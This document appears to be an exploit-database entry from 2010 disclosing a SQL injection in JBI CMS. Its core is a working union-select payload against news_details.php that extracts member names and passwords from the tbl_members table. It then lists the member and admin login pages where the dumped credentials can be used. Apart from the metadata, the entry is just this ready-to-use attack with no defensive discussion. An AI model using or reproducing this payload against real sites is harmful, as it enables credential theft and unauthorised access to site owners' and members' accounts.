JBI CMS - SQL Injection

Author: Cru3l.b0y
type: webapps
platform: php
port: 
date_added: 2010-11-04  
date_updated: 2010-11-04  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15416.txt  
In The Name Of GOD
[+] Exploit Title: JBI CMS SQL Injection Vulnerability
[+] Date: 2010-11-04
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.jamesblakeinternet.com/london/cms
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :

             http://target/path/news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_members

Login page for members : /member.php
Login page for Admins  : /admin